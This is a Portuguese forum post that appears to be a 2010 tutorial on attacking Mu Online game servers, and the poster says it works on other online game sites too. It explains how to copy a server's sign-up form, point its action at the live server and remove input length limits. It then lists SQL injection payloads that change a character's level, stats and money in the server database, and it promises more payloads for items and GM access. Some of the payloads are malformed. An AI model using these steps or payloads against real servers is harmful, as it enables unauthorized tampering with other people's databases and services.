Editando server de mu online com Firewall

Ir em baixo

Editando server de mu online com Firewall

Mensagem  Pedrin_do_do em Seg Dez 13 2010, 13:13

isso eh uma tecnica sql injection claro naum serve soh pra mu! serve pra qualquer tipo de jogo online! q receba dados atraves de site e assim nos podemos enviar comandos para o banco de dado do server! vcs jah ouviram flar '' os hack derrubarao tal server" " os hack deletaram todas as acc" "os hack mudaram a xp do server"" pois eh essa eh a tecnica!

1- vc vai no site do server, vai na pagina de cadastro e clica com o botao direito lah!
2- vc coloca mostrar codigo fonte, vai aparecer os codigos em html.
3- vc aperta ctr+f e escreve form e aperte buscar!
4- vc encontrara algo assim.FORM action= account.php method=post name=applMember onsubmit="return chkForm(document.applMember);"
5- depois q vc axar vc minimisa e vai lah na pagina de cadastro novamente e naum escreve nada apenas pareta ok como vc fosse se cadastrar! aparecera uma pagina de erro.
6- nessa pagina de erro vc clica o botao direito e vai em propriedades e copia a url q vai aparecer.
7- + uq vc vai fazer com essa url? hehe vc volta ao codigo fonte e cola a url na parte de action.
8- vai ficar assim FORM action=http://xgamesmu.servegame.com/index.php?op=account/account.php method=post name=applMember onsubmit="return chkForm(document.applMember);"
9- agora vc aperta ctr+f novamente e escreve maxlength e aperta buscar.
10- quando vc axar vai esta assim INPUT class=input03
maxLength=10 name=Member_Id
11- vc muda esse 10 para 9999
12- prontu vc criou uma copia de uma pagina e a tormou de uma forma vuneravel pra q vc possa enviar os comando!
13- quando vc for salvar o arquivo vc salva ele como .html
14- prontu pagina criada + e agora?

' UPDATE Character Set cLevel = '349' WHERE (Name = 'Rush')--
' UPDATE Character Set Reset = 9 WHERE (Name = 'Rush')--
' UPDATE ' DELETE Character = 9 WHERE (Name = 'Rush')--
' UPDATE Character Set Dexterity = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Energy = 25000 WHERE (Name = 'Rush')--
' UPDATE Character Set Strength = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Vitalit= 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Vitality = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Money = 1000000000000 WHERE (Name = 'rush')--

aqui estao os comando sql injection!
claru eu coloquei apenas os basico pq se naum vai ter negu derrubando server ae diretu hehe!

esses comandos serve para editar seu char na parte q tem rush vc coloca o nick do ser char lah no server!

agora tah explicado pq naum liberam o codigo fonte do global neh hehe!!

obs:essa tecnica fuciona melhor em sites php, num tem uns server com site igual o do global nesses principalmente!
em asp eh diferente naum da desse metodo!

depois eu posto novos comandos o dos itens, mudar de classe, mudar pra gm!!

isso naum pode ser apenas por pagina de cadastro serve pela pagina de reset a de trocar de senha e na de tirar pk.

Creditos:Pedrindodo
avatar
Pedrin_do_do
Mu Online
Mu Online

0 / 1000 / 100

Mensagens : 69
Data de inscrição : 07/12/2010
Idade : 20

Voltar ao Topo Ir em baixo

Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum